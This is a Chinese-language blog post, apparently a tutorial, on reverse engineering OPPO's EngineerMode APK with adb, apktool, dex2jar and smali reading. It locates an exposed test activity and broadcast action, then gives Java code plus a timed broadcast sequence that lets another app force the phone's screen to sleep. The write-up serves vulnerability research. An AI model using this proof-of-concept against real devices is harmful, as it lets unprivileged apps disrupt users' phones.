漏洞的主要切入点 “工程模式” 找到工程模式apk
OPPO:#36446337#。
华为:##121314##*
adb shell
cd /system/app/OppoEngineerMode/
//退出 shell
exit
//控制台 导出APK文件
adb pull /system/app/OppoEngineerMode/OppoEngineerMode.apk
//apktool 查看 manifest.xml
apktool d OppoEngineerMode.apk
注:apktool 不只可以查看manifest.xml,还可以看smali源码,使用sublime text2高亮查看,教程地址:https://www.jianshu.com/p/5fb93a270ad0
在 manifest.xml中可以找到关键代码
查看此类源码用到两个工具,dex2jar-2.1与jd-gui-osx-1.4.0;要注意的是 dex2jar版本不能过低,目前发现2.0不可用。
先解压OppoEngineerMode.apk
unzip OppoEngineerMode.apk所在路径 -d 解压到的文件夹路径
//取出classes.dex文件 使用dex2jar-2.1工具得到classes-dex2jar.jar
sh d2j-dex2jar.sh classes.dex -f
这样就可以使用jd-gui-osx-1.4.0查看JAR代码,找到manifest.xml中对应的类路径
image.png
读完代码找到关键代码 :goToSleep。想办法执行到此代码进行反推
首先 paramInt1 == 7 而这个参数源于showColow方法。而这个方法在class文件中却找不到调用处,不过 有一点有些可疑-wrap0是什么?如下
private BroadcastReceiver mReceiver = new BroadcastReceiver()
...
LcdColorTestActivity.-wrap0(LcdColorTestActivity.this, j, i);
# direct methods
.method static synthetic -wrap0(Lcom/oppo/autotest/lcd/LcdColorTestActivity;II)V
.locals 0
.param p0, "-this" # Lcom/oppo/autotest/lcd/LcdColorTestActivity;
.param p1, "type" # I
.param p2, "color" # I
.prologue
invoke-direct {p0, p1, p2}, Lcom/oppo/autotest/lcd/LcdColorTestActivity;->showColow(II)V
return-void
.end method
这也是门语言,具体不在这里记述,可看如下学习:https://segmentfault.com/a/1190000011746970
至少通过以上samli代码知道wrap0与color和type有关,回到class文件中,也只有color_type关键字可以尝试,最终得到 action:com.oppo.autotest.lcdcolortest 并且 color_type = 7时 净会被执行goToSleep方法。
继续反推,因为这个ACTION属于页面级注册,需要先启动此activity才能接收到action,所以 代码又需要产生几行 如下
String pkg = "com.oppo.engineermode";
String claz = "com.oppo.autotest.lcd.LcdColorTestActivity";
try {
Intent intent = new Intent();
ComponentName cp = new ComponentName(pkg, claz);
intent.setComponent(cp);
intent.setAction(Intent.ACTION_VIEW);
startActivity(intent);
} catch (Exception ex) {
ex.printStackTrace();
}
执行上面两行代码后 发现并无效果,屏幕只是黑了,但并未真正锁屏,通知栏还能下拉,背光灯还亮着,回过头来再想,是因为代码分析的不对吗?
非也,是因为注册是异步的,执行注册后立即执行发送广播未必能收得到 所以这里尝试注册后加延时600ms 再发送广播。成功了。
......
然而 解锁后 竟然会自动又锁屏,再一细看 并非锁屏,而是黑色未真正锁屏的状态,与执行startactivity的情景一样,回来再看class代码,发现竟然有 关闭activity的ACTION
if ("com.oppo.autotest.lcdcolortest.stop".equals(paramAnonymousContext)) {
LcdColorTestActivity.this.finish();
}
试着发送此广播,在 “com.oppo.autotest.lcdcolortest” 之后 ,这次连贯了。就此完成
总结:找漏洞是个慢工,细活,发现一点点可疑要多思考,多尝试,不能怕麻烦,也不要因为多次尝次给自己绕蒙了,时刻撑握好思路线。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
